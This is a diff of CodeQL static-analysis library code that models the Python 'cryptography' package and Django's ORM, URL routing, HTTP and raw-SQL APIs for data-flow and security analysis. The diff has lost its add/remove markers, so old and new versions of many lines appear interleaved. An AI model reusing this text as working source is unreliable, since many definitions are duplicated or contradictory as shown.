curveClassInstanceWithKeySize(DataFlow::TypeTracker::end(), keySize, origin).flowsTo(result)
}
}
// ---------------------------------------------------------------------------
@@ -179,9 +144,13 @@ private module CryptographyModel {
DataFlow::Node getCurveArg() { result in [this.getArg(0), this.getArgByName("curve")] }
override int getKeySizeWithOrigin(DataFlow::Node origin) {
this.getCurveArg() = Ecc::curveClassInstanceWithKeySize(result, origin)
or
this.getCurveArg() = Ecc::curveClassWithKeySize(result, origin)
exists(API::Node n |
n = Ecc::predefinedCurveClass(result) and origin = n.getAnImmediateUse()
|
this.getCurveArg() = n.getAUse()
or
this.getCurveArg() = n.getReturn().getAUse()
)
}
// Note: There is not really a key-size argument, since it's always specified by the curve.
@@ -202,9 +171,8 @@ private module CryptographyModel {
}
/** Gets a reference to a Cipher instance using algorithm with `algorithmName`. */
DataFlow::TypeTrackingNode cipherInstance(DataFlow::TypeTracker t, string algorithmName) {
t.start() and
exists(DataFlow::CallCfgNode call | result = call |
API::Node cipherInstance(string algorithmName) {
exists(API::CallNode call | result = call.getReturn() |
call =
API::moduleImport("cryptography")
.getMember("hazmat")
@@ -216,47 +184,6 @@ private module CryptographyModel {
call.getArg(0), call.getArgByName("algorithm")
]
)
or
exists(DataFlow::TypeTracker t2 | result = cipherInstance(t2, algorithmName).track(t2, t))
}
/** Gets a reference to a Cipher instance using algorithm with `algorithmName`. */
DataFlow::Node cipherInstance(string algorithmName) {
cipherInstance(DataFlow::TypeTracker::end(), algorithmName).flowsTo(result)
}
/** Gets a reference to the encryptor of a Cipher instance using algorithm with `algorithmName`. */
DataFlow::TypeTrackingNode cipherEncryptor(DataFlow::TypeTracker t, string algorithmName) {
t.start() and
result.(DataFlow::MethodCallNode).calls(cipherInstance(algorithmName), "encryptor")
or
exists(DataFlow::TypeTracker t2 | result = cipherEncryptor(t2, algorithmName).track(t2, t))
}
/**
* Gets a reference to the encryptor of a Cipher instance using algorithm with `algorithmName`.
*
* You obtain an encryptor by using the `encryptor()` method on a Cipher instance.
*/
DataFlow::Node cipherEncryptor(string algorithmName) {
cipherEncryptor(DataFlow::TypeTracker::end(), algorithmName).flowsTo(result)
}
  /** Gets a reference to the decryptor of a Cipher instance using algorithm with `algorithmName`. */
DataFlow::TypeTrackingNode cipherDecryptor(DataFlow::TypeTracker t, string algorithmName) {
t.start() and
result.(DataFlow::MethodCallNode).calls(cipherInstance(algorithmName), "decryptor")
or
exists(DataFlow::TypeTracker t2 | result = cipherDecryptor(t2, algorithmName).track(t2, t))
}
/**
* Gets a reference to the decryptor of a Cipher instance using algorithm with `algorithmName`.
*
   * You obtain a decryptor by using the `decryptor()` method on a Cipher instance.
*/
DataFlow::Node cipherDecryptor(string algorithmName) {
cipherDecryptor(DataFlow::TypeTracker::end(), algorithmName).flowsTo(result)
}
/**
@@ -267,11 +194,12 @@ private module CryptographyModel {
string algorithmName;
CryptographyGenericCipherOperation() {
exists(DataFlow::Node object, string method |
object in [cipherEncryptor(algorithmName), cipherDecryptor(algorithmName)] and
method in ["update", "update_into"] and
this.calls(object, method)
)
this =
cipherInstance(algorithmName)
.getMember(["decryptor", "encryptor"])
.getReturn()
.getMember(["update", "update_into"])
.getACall()
}
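  // A minimal sketch of the pattern matched above (`key`/`nonce` are placeholders):
  //
  //    import os
  //    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
  //
  //    key, nonce = os.urandom(32), os.urandom(16)
  //    cipher = Cipher(algorithms.AES(key), modes.CTR(nonce))
  //    ciphertext = cipher.encryptor().update(b"secret")   # <cipher>.encryptor().update(...)
  //    plaintext = cipher.decryptor().update(ciphertext)   # <cipher>.decryptor().update(...)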
override Cryptography::CryptographicAlgorithm getAlgorithm() {
@@ -298,9 +226,8 @@ private module CryptographyModel {
}
/** Gets a reference to a Hash instance using algorithm with `algorithmName`. */
private DataFlow::TypeTrackingNode hashInstance(DataFlow::TypeTracker t, string algorithmName) {
t.start() and
exists(DataFlow::CallCfgNode call | result = call |
private API::Node hashInstance(string algorithmName) {
exists(API::CallNode call | result = call.getReturn() |
call =
API::moduleImport("cryptography")
.getMember("hazmat")
@@ -312,13 +239,6 @@ private module CryptographyModel {
call.getArg(0), call.getArgByName("algorithm")
]
)
or
exists(DataFlow::TypeTracker t2 | result = hashInstance(t2, algorithmName).track(t2, t))
}
/** Gets a reference to a Hash instance using algorithm with `algorithmName`. */
DataFlow::Node hashInstance(string algorithmName) {
hashInstance(DataFlow::TypeTracker::end(), algorithmName).flowsTo(result)
}
/**
@@ -328,7 +248,9 @@ private module CryptographyModel {
DataFlow::MethodCallNode {
string algorithmName;
CryptographyGenericHashOperation() { this.calls(hashInstance(algorithmName), "update") }
CryptographyGenericHashOperation() {
this = hashInstance(algorithmName).getMember("update").getACall()
}
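  // A minimal sketch of the pattern matched above:
  //
  //    from cryptography.hazmat.primitives import hashes
  //
  //    digest = hashes.Hash(hashes.SHA256())
  //    digest.update(b"data")   # <hash instance>.update(...)
  //    digest.finalize()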
override Cryptography::CryptographicAlgorithm getAlgorithm() {
result.matchesName(algorithmName)

View File

@@ -526,8 +526,11 @@ module PrivateDjango {
/** Gets a reference to the `django` module. */
API::Node django() { result = API::moduleImport("django") }
/** DEPRECATED: Alias for `DjangoImpl` */
deprecated module django = DjangoImpl;
/** Provides models for the `django` module. */
module django {
module DjangoImpl {
// -------------------------------------------------------------------------
// django.db
// -------------------------------------------------------------------------
@@ -541,14 +544,17 @@ module PrivateDjango {
DjangoDb() { this = API::moduleImport("django").getMember("db") }
}
/** DEPRECATED: Alias for `DB` */
deprecated module db = DB;
/** Provides models for the `django.db` module. */
module db {
module DB {
/** Gets a reference to the `django.db.connection` object. */
API::Node connection() { result = db().getMember("connection") }
/** A `django.db.connection` is a PEP249 compliant DB connection. */
class DjangoDbConnection extends PEP249::Connection::InstanceSource {
DjangoDbConnection() { this = connection().getAUse() }
DjangoDbConnection() { this = connection().getAnImmediateUse() }
}
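      // For example (sketch), the shared connection object is used like any other
      // PEP 249 connection:
      //
      //    from django.db import connection
      //
      //    with connection.cursor() as cursor:
      //        cursor.execute("SELECT 1")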
// -------------------------------------------------------------------------
@@ -557,15 +563,18 @@ module PrivateDjango {
/** Gets a reference to the `django.db.models` module. */
API::Node models() { result = db().getMember("models") }
/** DEPRECATED: Alias for `Models` */
deprecated module models = Models;
/** Provides models for the `django.db.models` module. */
module models {
module Models {
/**
* Provides models for the `django.db.models.Model` class and subclasses.
*
* See https://docs.djangoproject.com/en/3.1/topics/db/models/.
*/
module Model {
/** Gets a reference to the `flask.views.View` class or any subclass. */
/** Gets a reference to the `django.db.models.Model` class or any subclass. */
API::Node subclassRef() {
result =
API::moduleImport("django")
@@ -573,45 +582,242 @@ module PrivateDjango {
.getMember("models")
.getMember("Model")
.getASubclass*()
or
result =
API::moduleImport("django")
.getMember("db")
.getMember("models")
.getMember("base")
.getMember("Model")
.getASubclass*()
or
result =
API::moduleImport("polymorphic")
.getMember("models")
.getMember("PolymorphicModel")
.getASubclass*()
}
/**
* A source of instances of `django.db.models.Model` class or any subclass, extend this class to model new instances.
*
* This can include instantiations of the class, return values from function
* calls, or a special parameter that will be set when functions are called by an external
* library.
*
* Use the predicate `Model::instance()` to get references to instances of `django.db.models.Model` class or any subclass.
*/
abstract class InstanceSource extends DataFlow::LocalSourceNode {
/** Gets the model class that this is an instance source of. */
abstract API::Node getModelClass();
/** Holds if this instance-source is fetching data from the DB. */
abstract predicate isDbFetch();
}
/** A direct instantiation of `django.db.models.Model` class or any subclass. */
private class ClassInstantiation extends InstanceSource, DataFlow::CallCfgNode {
API::Node modelClass;
ClassInstantiation() {
modelClass = subclassRef() and
this = modelClass.getACall()
}
override API::Node getModelClass() { result = modelClass }
override predicate isDbFetch() { none() }
}
/** A method call on a query-set or manager that returns an instance of a django model. */
private class QuerySetMethod extends InstanceSource, DataFlow::CallCfgNode {
API::Node modelClass;
string methodName;
QuerySetMethod() {
modelClass = subclassRef() and
methodName in ["get", "create", "earliest", "latest", "first", "last"] and
this = [manager(modelClass), querySet(modelClass)].getMember(methodName).getACall()
}
override API::Node getModelClass() { result = modelClass }
override predicate isDbFetch() { not methodName = "create" }
}
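          // For example, with a hypothetical model `Profile` (not from this file):
          //
          //    from django.db import models
          //
          //    class Profile(models.Model):
          //        name = models.CharField(max_length=100)
          //
          //    p = Profile.objects.get(pk=1)                  # DB fetch returning one instance
          //    p = Profile.objects.filter(name="x").first()   # likewise, via a query-set
          //    p = Profile.objects.create(name="x")           # returns an instance, but is not a fetch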
/**
* A method call on a query-set or manager that returns a collection
* containing instances of a django model.
*/
class QuerySetMethodInstanceCollection extends DataFlow::CallCfgNode {
API::Node modelClass;
string methodName;
QuerySetMethodInstanceCollection() {
modelClass = subclassRef() and
this = querySetReturningMethod(modelClass, methodName).getACall() and
not methodName in ["none", "datetimes", "dates", "values", "values_list"]
or
// TODO: When we have flow-summaries, we should be able to model `values` and `values_list`
// Potentially by doing `synthetic ===store of list element==> <Model>.objects`, and then
// `.all()` just keeps that content, and `.first()` will do a read step (of the list element).
//
// So for `Model.objects.filter().exclude().first()` we would have
// 1: <Synthetic node for Model> ===store of list element==> Model.objects
// 2: Model.objects ==> Model.objects.filter()
// 3: Model.objects.filter() ==> Model.objects.filter().exclude()
// 4: Model.objects.filter().exclude() ===read of list element==> Model.objects.filter().exclude().first()
//
// This also means that `.none()` could clear contents. Right now we
// think that the result of `Model.objects.none().all()` can contain
// Model objects, but it will be empty due to the `.none()` part. Not
// that this is important, since no-one would need to write
// `.none().all()` code anyway, but it would be cool to be able to model it properly :D
//
//
// The big benefit is for how we could then model `values`/`values_list`. For example,
// `Model.objects.value_list(name, description)` would result in (for the attribute description)
// 0: <Synthetic node for Model> -- [attr description]
// 1: ==> Model.objects [ListElement, attr description]
// 2: ==> .value_list(...) [ListElement, TupleIndex 1]
//
// but for now, we just model a store step directly from the synthetic
// node to the method call.
//
// extra method on query-set/manager that does _not_ return a query-set,
// but a collection of instances.
modelClass = subclassRef() and
methodName in ["iterator", "bulk_create"] and
this = [manager(modelClass), querySet(modelClass)].getMember(methodName).getACall()
}
/** Gets the model class that this is an instance source of. */
API::Node getModelClass() { result = modelClass }
/** Holds if this instance-source is fetching data from the DB. */
predicate isDbFetch() { not methodName = "bulk_create" }
}
/**
* A method call on a query-set or manager that returns a dictionary
             * containing instances of a django model as the values.
*/
class QuerySetMethodInstanceDictValue extends DataFlow::CallCfgNode {
API::Node modelClass;
QuerySetMethodInstanceDictValue() {
modelClass = subclassRef() and
this = [manager(modelClass), querySet(modelClass)].getMember("in_bulk").getACall()
}
/** Gets the model class that this is an instance source of. */
API::Node getModelClass() { result = modelClass }
/** Holds if this instance-source is fetching data from the DB. */
predicate isDbFetch() { any() }
}
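          // Continuing the hypothetical `Profile` model from above (sketch):
          //
          //    ps = list(Profile.objects.all().iterator())            # collection of instances (DB fetch)
          //    ps = Profile.objects.bulk_create([Profile(name="x")])  # collection, but not a fetch
          //    by_pk = Profile.objects.in_bulk([1, 2, 3])             # dict {pk: instance} (DB fetch)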
/**
* Gets a reference to an instance of `django.db.models.Model` class or any subclass,
* where `modelClass` specifies the class.
*/
private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t, API::Node modelClass) {
t.start() and
modelClass = result.(InstanceSource).getModelClass()
or
exists(DataFlow::TypeTracker t2 | result = instance(t2, modelClass).track(t2, t))
}
/**
* Gets a reference to an instance of `django.db.models.Model` class or any subclass,
* where `modelClass` specifies the class.
*/
DataFlow::Node instance(API::Node modelClass) {
instance(DataFlow::TypeTracker::end(), modelClass).flowsTo(result)
}
}
/**
* Gets a reference to the Manager (django.db.models.Manager) for a django Model,
* accessed by `<ModelName>.objects`.
* Provides models for the `django.db.models.FileField` class and `ImageField` subclasses.
*
* See
* - https://docs.djangoproject.com/en/3.1/ref/models/fields/#django.db.models.FileField
* - https://docs.djangoproject.com/en/3.1/ref/models/fields/#django.db.models.ImageField
*/
API::Node manager() { result = Model::subclassRef().getMember("objects") }
module FileField {
/** Gets a reference to the `django.db.models.FileField` or the `django.db.models.ImageField` class or any subclass. */
API::Node subclassRef() {
exists(string className | className in ["FileField", "ImageField"] |
// commonly used alias
result =
API::moduleImport("django")
.getMember("db")
.getMember("models")
.getMember(className)
.getASubclass*()
or
// actual class definition
result =
API::moduleImport("django")
.getMember("db")
.getMember("models")
.getMember("fields")
.getMember("files")
.getMember(className)
.getASubclass*()
)
}
}
/**
* Gets a reference to the Manager (django.db.models.Manager) for the django Model `modelClass`,
* accessed by `<modelClass>.objects`.
*/
API::Node manager(API::Node modelClass) {
modelClass = Model::subclassRef() and
result = modelClass.getMember("objects")
}
/**
* Gets a method with `name` that returns a QuerySet.
* This method can originate on a QuerySet or a Manager.
* `modelClass` specifies the django Model that this query-set originates from.
*
* See https://docs.djangoproject.com/en/3.1/ref/models/querysets/
*/
API::Node querySetReturningMethod(string name) {
API::Node querySetReturningMethod(API::Node modelClass, string name) {
name in [
"none", "all", "filter", "exclude", "complex_filter", "union", "intersection",
"difference", "select_for_update", "select_related", "prefetch_related", "order_by",
"distinct", "reverse", "defer", "only", "using", "annotate", "extra", "raw",
"datetimes", "dates", "values", "values_list", "alias"
] and
result = [manager(), querySet()].getMember(name)
result = [manager(modelClass), querySet(modelClass)].getMember(name)
or
name = "get_queryset" and
result = manager(modelClass).getMember(name)
}
/**
* Gets a reference to a QuerySet (django.db.models.query.QuerySet).
* `modelClass` specifies the django Model that this query-set originates from.
*
* See https://docs.djangoproject.com/en/3.1/ref/models/querysets/
*/
API::Node querySet() { result = querySetReturningMethod(_).getReturn() }
API::Node querySet(API::Node modelClass) {
result = querySetReturningMethod(modelClass, _).getReturn()
}
/** Gets a reference to the `django.db.models.expressions` module. */
API::Node expressions() { result = models().getMember("expressions") }
/** DEPRECATED: Alias for `Expressions` */
deprecated module expressions = Expressions;
/** Provides models for the `django.db.models.expressions` module. */
module expressions {
/** Provides models for the `django.db.models.expressions.RawSQL` class. */
module RawSQL {
module Expressions {
          /** Provides models for the `django.db.models.expressions.RawSQL` class. */
module RawSql {
/**
             * Gets a reference to the `django.db.models.expressions.RawSQL` class.
*/
@@ -644,6 +850,169 @@ module PrivateDjango {
instance(DataFlow::TypeTracker::end(), sql).flowsTo(result)
}
}
/** DEPRECATED: Alias for RawSql */
deprecated module RawSQL = RawSql;
}
/** This internal module provides data-flow modeling of Django ORM. */
private module OrmDataflow {
private import semmle.python.dataflow.new.internal.DataFlowPrivate::Orm
/** Gets the (AST) class of the Django model class `modelClass`. */
Class getModelClassClass(API::Node modelClass) {
result.getParent() = modelClass.getAnImmediateUse().asExpr() and
modelClass = Model::subclassRef()
}
          /** A synthetic node representing the data for a Django ORM model saved in a DB. */
class SyntheticDjangoOrmModelNode extends SyntheticOrmModelNode {
API::Node modelClass;
SyntheticDjangoOrmModelNode() { this.getClass() = getModelClassClass(modelClass) }
/** Gets the API node for this Django model class. */
API::Node getModelClass() { result = modelClass }
}
/**
* Gets a synthetic node where the data in the attribute `fieldName` can flow
* to, when a DB store is made on `subModel`, taking ORM inheritance into
* account.
*
* If `fieldName` is defined in class `base`, the results will include the
* synthetic node for `base` itself, the synthetic node for `subModel`, as
* well as all the classes in-between (in the class hierarchy).
*/
SyntheticDjangoOrmModelNode nodeToStoreIn(API::Node subModel, string fieldName) {
exists(Class base, API::Node baseModel, API::Node resultModel |
baseModel = Model::subclassRef() and
resultModel = Model::subclassRef() and
baseModel.getASubclass*() = subModel and
base = getModelClassClass(baseModel) and
exists(Variable v |
base.getBody().getAnItem().(AssignStmt).defines(v) and
v.getId() = fieldName
)
|
baseModel.getASubclass*() = resultModel and
resultModel.getASubclass*() = subModel and
result.getModelClass() = resultModel
)
}
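          // For example (sketch; `Base`/`Sub` are hypothetical models):
          //
          //    class Base(models.Model):
          //        title = models.CharField(max_length=100)
          //
          //    class Sub(Base):
          //        pass
          //
          //    Sub.objects.create(title=x)   # stored on the synthetic nodes for both `Sub` and `Base`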
/**
* Gets the synthetic node where data could be loaded from, when a fetch is
* made on `modelClass`.
*
* In vanilla Django inheritance, this is simply the model itself, but if a
* model is based on `polymorphic.models.PolymorphicModel`, a fetch of the
* base-class can also yield instances of its subclasses.
*/
SyntheticDjangoOrmModelNode nodeToLoadFrom(API::Node modelClass) {
result.getModelClass() = modelClass
or
exists(API::Node polymorphicModel |
polymorphicModel =
API::moduleImport("polymorphic").getMember("models").getMember("PolymorphicModel")
|
polymorphicModel.getASubclass+() = modelClass and
modelClass.getASubclass+() = result.getModelClass()
)
}
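          // For example (sketch): with hypothetical models `class Animal(PolymorphicModel)`
          // and `class Dog(Animal)`, a call like `Animal.objects.first()` may return a `Dog`
          // instance, so a load from `Animal` also reads the synthetic node for `Dog`.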
/** Additional data-flow steps for Django ORM models. */
          class DjangoOrmSteps extends AdditionalOrmSteps {
override predicate storeStep(
DataFlow::Node nodeFrom, DataFlow::Content c, DataFlow::Node nodeTo
) {
// attribute value from constructor call -> object created
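              // (e.g. `Profile(name=tainted)` stores `tainted` under attribute `name` on
              // the newly created object; `Profile` is a hypothetical model)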
exists(DataFlow::CallCfgNode call, string fieldName |
// Note: Currently only supports kwargs, which should by far be the most
// common way to do things. We _should_ investigate how often
// positional-args are used.
call = Model::subclassRef().getACall() and
nodeFrom = call.getArgByName(fieldName) and
c.(DataFlow::AttributeContent).getAttribute() = fieldName and
nodeTo = call
)
or
// attribute store in `<Model>.objects.create`, `get_or_create`, and `update_or_create`
// see https://docs.djangoproject.com/en/4.0/ref/models/querysets/#create
// see https://docs.djangoproject.com/en/4.0/ref/models/querysets/#get-or-create
// see https://docs.djangoproject.com/en/4.0/ref/models/querysets/#update-or-create
// TODO: This does currently not handle values passed in the `defaults` dictionary
exists(
DataFlow::CallCfgNode call, API::Node modelClass, string fieldName,
string methodName
|
modelClass = Model::subclassRef() and
methodName in ["create", "get_or_create", "update_or_create"] and
call = modelClass.getMember("objects").getMember(methodName).getACall() and
nodeFrom = call.getArgByName(fieldName) and
c.(DataFlow::AttributeContent).getAttribute() = fieldName and
(
// -> object created
(
methodName = "create" and nodeTo = call
or
// TODO: for these two methods, the result is a tuple `(<Model>, bool)`,
// which we need flow-summaries to model properly
methodName in ["get_or_create", "update_or_create"] and none()
)
or
// -> DB store on synthetic node
nodeTo = nodeToStoreIn(modelClass, fieldName)
)
)
or
// attribute store in `<Model>.objects.[<QuerySet>].update()` -> synthetic
// see https://docs.djangoproject.com/en/4.0/ref/models/querysets/#update
exists(DataFlow::CallCfgNode call, API::Node modelClass, string fieldName |
call = [manager(modelClass), querySet(modelClass)].getMember("update").getACall() and
nodeFrom = call.getArgByName(fieldName) and
c.(DataFlow::AttributeContent).getAttribute() = fieldName and
nodeTo = nodeToStoreIn(modelClass, fieldName)
)
or
// synthetic -> method-call that returns collection of ORM models (all/filter/...)
exists(API::Node modelClass |
nodeFrom = nodeToLoadFrom(modelClass) and
nodeTo.(Model::QuerySetMethodInstanceCollection).getModelClass() = modelClass and
nodeTo.(Model::QuerySetMethodInstanceCollection).isDbFetch() and
c instanceof DataFlow::ListElementContent
)
or
// synthetic -> method-call that returns dictionary with ORM models as values
exists(API::Node modelClass |
nodeFrom = nodeToLoadFrom(modelClass) and
nodeTo.(Model::QuerySetMethodInstanceDictValue).getModelClass() = modelClass and
nodeTo.(Model::QuerySetMethodInstanceDictValue).isDbFetch() and
c instanceof DataFlow::DictionaryElementAnyContent
)
}
override predicate jumpStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
// save -> synthetic
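              // e.g. (sketch, hypothetical model):
              //    p = Profile.objects.get(pk=1)
              //    p.name = tainted
              //    p.save()   # `p` (with its attribute contents) flows to the synthetic DB node(s)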
exists(API::Node modelClass, DataFlow::MethodCallNode saveCall |
// TODO: The `nodeTo` should be restricted more, such that flow to
// base-classes are only for the fields that are defined in the
// base-class... but only passing on flow for a specific attribute requires flow-summaries,
// so we can do
// `obj (in obj.save call) ==read of attr==> synthetic attr on base-class ==store of attr==> synthetic for base-class`
nodeTo = nodeToStoreIn(modelClass, _) and
saveCall.calls(Model::instance(modelClass), "save") and
nodeFrom = saveCall.getObject()
)
or
// synthetic -> method-call that returns single ORM model (get/first/...)
exists(API::Node modelClass |
nodeFrom = nodeToLoadFrom(modelClass) and
nodeTo.(Model::InstanceSource).getModelClass() = modelClass and
nodeTo.(Model::InstanceSource).isDbFetch()
)
}
}
}
}
}
@@ -659,8 +1028,8 @@ module PrivateDjango {
DataFlow::Node sql;
ObjectsAnnotate() {
this = django::db::models::querySetReturningMethod("annotate").getACall() and
django::db::models::expressions::RawSQL::instance(sql) in [
this = DjangoImpl::DB::Models::querySetReturningMethod(_, "annotate").getACall() and
DjangoImpl::DB::Models::Expressions::RawSql::instance(sql) in [
this.getArg(_), this.getArgByName(_)
]
}
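    // For example (sketch; `Profile` is a hypothetical model):
    //
    //    from django.db.models.expressions import RawSQL
    //
    //    Profile.objects.annotate(val=RawSQL("select (%s)", (param,)))  # the SQL text is the sink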
@@ -677,8 +1046,8 @@ module PrivateDjango {
DataFlow::Node sql;
ObjectsAlias() {
this = django::db::models::querySetReturningMethod("alias").getACall() and
django::db::models::expressions::RawSQL::instance(sql) in [
this = DjangoImpl::DB::Models::querySetReturningMethod(_, "alias").getACall() and
DjangoImpl::DB::Models::Expressions::RawSql::instance(sql) in [
this.getArg(_), this.getArgByName(_)
]
}
@@ -694,7 +1063,7 @@ module PrivateDjango {
* - https://docs.djangoproject.com/en/3.1/ref/models/querysets/#raw
*/
private class ObjectsRaw extends SqlExecution::Range, DataFlow::CallCfgNode {
ObjectsRaw() { this = django::db::models::querySetReturningMethod("raw").getACall() }
ObjectsRaw() { this = DjangoImpl::DB::Models::querySetReturningMethod(_, "raw").getACall() }
override DataFlow::Node getSql() { result = this.getArg(0) }
}
@@ -705,7 +1074,9 @@ module PrivateDjango {
* See https://docs.djangoproject.com/en/3.1/ref/models/querysets/#extra
*/
private class ObjectsExtra extends SqlExecution::Range, DataFlow::CallCfgNode {
ObjectsExtra() { this = django::db::models::querySetReturningMethod("extra").getACall() }
ObjectsExtra() {
this = DjangoImpl::DB::Models::querySetReturningMethod(_, "extra").getACall()
}
override DataFlow::Node getSql() {
result in [
@@ -720,8 +1091,11 @@ module PrivateDjango {
/** Gets a reference to the `django.urls` module. */
API::Node urls() { result = django().getMember("urls") }
/** DEPRECATED: Alias for `Urls` */
deprecated module urls = Urls;
/** Provides models for the `django.urls` module */
module urls {
module Urls {
/**
* Gets a reference to the `django.urls.path` function.
* See https://docs.djangoproject.com/en/3.0/ref/urls/#path
@@ -741,10 +1115,16 @@ module PrivateDjango {
/** Gets a reference to the `django.conf` module. */
API::Node conf() { result = django().getMember("conf") }
/** DEPRECATED: Alias for `Conf` */
deprecated module conf = Conf;
/** Provides models for the `django.conf` module */
module conf {
module Conf {
/** DEPRECATED: Alias for `ConfUrls` */
deprecated module conf_urls = ConfUrls;
/** Provides models for the `django.conf.urls` module */
module conf_urls {
module ConfUrls {
// -------------------------------------------------------------------------
// django.conf.urls
// -------------------------------------------------------------------------
@@ -767,16 +1147,22 @@ module PrivateDjango {
/** Gets a reference to the `django.http` module. */
API::Node http() { result = django().getMember("http") }
/** DEPRECATED: Alias for `Http` */
deprecated module http = Http;
/** Provides models for the `django.http` module */
module http {
module Http {
// ---------------------------------------------------------------------------
// django.http.request
// ---------------------------------------------------------------------------
/** Gets a reference to the `django.http.request` module. */
API::Node request() { result = http().getMember("request") }
/** DEPRECATED: Alias for `Request` */
deprecated module request = Request;
/** Provides models for the `django.http.request` module. */
module request {
module Request {
/**
* Provides models for the `django.http.request.HttpRequest` class
*
@@ -857,7 +1243,7 @@ module PrivateDjango {
// special handling of the `build_absolute_uri` method, see
// https://docs.djangoproject.com/en/3.0/ref/request-response/#django.http.HttpRequest.build_absolute_uri
exists(DataFlow::AttrRead attr, DataFlow::CallCfgNode call, DataFlow::Node instance |
instance = django::http::request::HttpRequest::instance() and
instance = DjangoImpl::Http::Request::HttpRequest::instance() and
attr.getObject() = instance
|
attr.getAttributeName() = "build_absolute_uri" and
@@ -934,8 +1320,11 @@ module PrivateDjango {
/** Gets a reference to the `django.http.response` module. */
API::Node response() { result = http().getMember("response") }
/** DEPRECATED: Alias for `Response` */
deprecated module response = Response;
/** Provides models for the `django.http.response` module */
module response {
module Response {
/**
* Provides models for the `django.http.response.HttpResponse` class
*
@@ -1669,17 +2058,17 @@ module PrivateDjango {
/** Gets a reference to the `django.http.response.HttpResponse.write` function. */
private DataFlow::TypeTrackingNode write(
django::http::response::HttpResponse::InstanceSource instance, DataFlow::TypeTracker t
DjangoImpl::Http::Response::HttpResponse::InstanceSource instance, DataFlow::TypeTracker t
) {
t.startInAttr("write") and
instance = django::http::response::HttpResponse::instance() and
instance = DjangoImpl::Http::Response::HttpResponse::instance() and
result = instance
or
exists(DataFlow::TypeTracker t2 | result = write(instance, t2).track(t2, t))
}
/** Gets a reference to the `django.http.response.HttpResponse.write` function. */
DataFlow::Node write(django::http::response::HttpResponse::InstanceSource instance) {
DataFlow::Node write(DjangoImpl::Http::Response::HttpResponse::InstanceSource instance) {
write(instance, DataFlow::TypeTracker::end()).flowsTo(result)
}
@@ -1689,7 +2078,7 @@ module PrivateDjango {
* See https://docs.djangoproject.com/en/3.1/ref/request-response/#django.http.HttpResponse.write
*/
class HttpResponseWriteCall extends HTTP::Server::HttpResponse::Range, DataFlow::CallCfgNode {
django::http::response::HttpResponse::InstanceSource instance;
DjangoImpl::Http::Response::HttpResponse::InstanceSource instance;
HttpResponseWriteCall() { this.getFunction() = write(instance) }
@@ -1710,7 +2099,7 @@ module PrivateDjango {
class DjangoResponseSetCookieCall extends HTTP::Server::CookieWrite::Range,
DataFlow::MethodCallNode {
DjangoResponseSetCookieCall() {
this.calls(django::http::response::HttpResponse::instance(), "set_cookie")
this.calls(DjangoImpl::Http::Response::HttpResponse::instance(), "set_cookie")
}
override DataFlow::Node getHeaderArg() { none() }
@@ -1730,7 +2119,7 @@ module PrivateDjango {
class DjangoResponseDeleteCookieCall extends HTTP::Server::CookieWrite::Range,
DataFlow::MethodCallNode {
DjangoResponseDeleteCookieCall() {
this.calls(django::http::response::HttpResponse::instance(), "delete_cookie")
this.calls(DjangoImpl::Http::Response::HttpResponse::instance(), "delete_cookie")
}
override DataFlow::Node getHeaderArg() { none() }
@@ -1757,7 +2146,7 @@ module PrivateDjango {
this.asCfgNode() = subscript
|
cookieLookup.getAttributeName() = "cookies" and
cookieLookup.getObject() = django::http::response::HttpResponse::instance() and
cookieLookup.getObject() = DjangoImpl::Http::Response::HttpResponse::instance() and
exists(DataFlow::Node subscriptObj |
subscriptObj.asCfgNode() = subscript.getObject()
|
@@ -1783,8 +2172,11 @@ module PrivateDjango {
/** Gets a reference to the `django.shortcuts` module. */
API::Node shortcuts() { result = django().getMember("shortcuts") }
/** DEPRECATED: Alias for `Shortcuts` */
deprecated module shortcuts = Shortcuts;
/** Provides models for the `django.shortcuts` module */
module shortcuts {
module Shortcuts {
/**
* Gets a reference to the `django.shortcuts.redirect` function
*
@@ -1802,7 +2194,9 @@ module PrivateDjango {
* thereby handling user input.
*/
class DjangoFormClass extends Class, SelfRefMixin {
DjangoFormClass() { this.getABase() = Django::Forms::Form::subclassRef().getAUse().asExpr() }
DjangoFormClass() {
this.getParent() = Django::Forms::Form::subclassRef().getAnImmediateUse().asExpr()
}
}
/**
@@ -1835,7 +2229,7 @@ module PrivateDjango {
*/
class DjangoFormFieldClass extends Class {
DjangoFormFieldClass() {
this.getABase() = Django::Forms::Field::subclassRef().getAUse().asExpr()
this.getParent() = Django::Forms::Field::subclassRef().getAnImmediateUse().asExpr()
}
}
@@ -1862,7 +2256,8 @@ module PrivateDjango {
// routing modeling
// ---------------------------------------------------------------------------
/**
* In order to recognize a class as being a django view class, based on the `as_view`
* A class that may be a django view class. In order to recognize a class as being a django view class,
* based on the `as_view`
* call, we need to be able to track such calls on _any_ class. This is provided by
* the member predicates of this QL class.
*
@@ -1873,7 +2268,7 @@ module PrivateDjango {
/** Gets a reference to this class. */
private DataFlow::TypeTrackingNode getARef(DataFlow::TypeTracker t) {
t.start() and
result.asExpr().(ClassExpr) = this.getParent()
result.asExpr() = this.getParent()
or
exists(DataFlow::TypeTracker t2 | result = this.getARef(t2).track(t2, t))
}
@@ -1937,7 +2332,7 @@ module PrivateDjango {
*/
class DjangoViewClassFromSuperClass extends DjangoViewClass {
DjangoViewClassFromSuperClass() {
this.getABase() = Django::Views::View::subclassRef().getAUse().asExpr()
this.getParent() = Django::Views::View::subclassRef().getAnImmediateUse().asExpr()
}
}
@@ -1973,7 +2368,7 @@ module PrivateDjango {
/** Provides a class for modeling new django route handlers. */
module DjangoRouteHandler {
/**
* Extend this class to model new APIs. If you want to refine existing API models,
* A django route handler. Extend this class to model new APIs. If you want to refine existing API models,
* extend `DjangoRouteHandler` instead.
*/
abstract class Range extends Function { }
@@ -2059,7 +2454,7 @@ module PrivateDjango {
* See https://docs.djangoproject.com/en/3.0/ref/urls/#path
*/
private class DjangoUrlsPathCall extends DjangoRouteSetup, DataFlow::CallCfgNode {
DjangoUrlsPathCall() { this = django::urls::path().getACall() }
DjangoUrlsPathCall() { this = DjangoImpl::Urls::path().getACall() }
override DataFlow::Node getUrlPatternArg() {
result in [this.getArg(0), this.getArgByName("route")]
@@ -2142,7 +2537,7 @@ module PrivateDjango {
*/
private class DjangoUrlsRePathCall extends DjangoRegexRouteSetup, DataFlow::CallCfgNode {
DjangoUrlsRePathCall() {
this = django::urls::re_path().getACall() and
this = DjangoImpl::Urls::re_path().getACall() and
// `django.conf.urls.url` (which we support directly with
// `DjangoConfUrlsUrlCall`), is implemented in Django 2+ as backward compatibility
// using `django.urls.re_path`. See
